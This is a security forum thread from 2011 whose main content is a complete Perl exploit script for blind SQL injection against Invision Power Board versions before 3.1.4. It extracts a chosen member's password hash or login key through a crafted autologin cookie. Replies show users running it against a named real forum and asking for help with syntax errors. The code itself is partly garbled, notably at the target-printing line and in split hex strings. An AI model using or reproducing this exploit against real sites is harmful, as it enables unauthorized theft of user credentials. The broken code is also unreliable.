|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 81
Members: 0
Total: 81
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
IPBoard SQL injection < 3.1.4 - Ineedforum.com |
|
Posted: Wed Apr 27, 2011 9:55 am |
|
|
StellDJ |
Beginner |
|
|
Joined: Mar 31, 2011 |
Posts: 3 |
|
|
|
|
|
|
|
Code: | #!/usr/bin/perl
## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
## tested on version 1 Final and version 3.1.4
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb3.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 3.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http://)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print $target(' - IPB 2.*');
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{bb DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr(42);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%7 2%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%2 1%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3,$nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
print q(
Invision Power Board v < 3.1.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb3.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.*
2 - IPB 3.* (Prior To 3.1.4)
e.g. r57ipb3.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
|
|
|
Last edited by StellDJ on Wed Apr 27, 2011 10:19 am; edited 3 times in total |
|
|
|
|
|
Re: IPBoard SQL injection < 3.1.4 - Ineedforum.com |
|
Posted: Wed Apr 27, 2011 9:59 am |
|
|
StellDJ |
Beginner |
|
|
Joined: Mar 31, 2011 |
Posts: 3 |
|
|
|
|
|
|
|
72 line write the targer url.
print (($target)?(' - IPB 3.*')' - IPB 2.*')' - IPB 1.*'));
i think this very good exploit but i don1t know 72 line correct syntax url pls sombady help.
Only this if you hack ipb 3 (in 72 line):
print $target(' - IPB 3.*');
Then run pl:
syntax:
r57ipb3.pl [server] [/folder/] [member id] [targets]
eg: r57ipb3.pl 127.0.0.1 /IPB/ 1 1 |
|
|
|
|
Posted: Mon Jul 04, 2011 11:09 pm |
|
|
tox1c |
Active user |
|
|
Joined: Sep 22, 2009 |
Posts: 41 |
|
|
|
|
|
|
|
i get this error.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Perl64\bin>perl 1.pl www.tr-clan.com /forums/ 1 3
syntax error at 1.pl line 72, near ");"
Can't find string terminator ")" anywhere before EOF at 1.pl line 168. |
|
|
|
|
Posted: Wed Aug 03, 2011 12:10 am |
|
|
MCF |
Regular user |
|
|
Joined: Jul 29, 2011 |
Posts: 10 |
|
|
|
|
|
|
|
Anyone know why I keep getting this error? Trying it on a ipb 3 forum |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|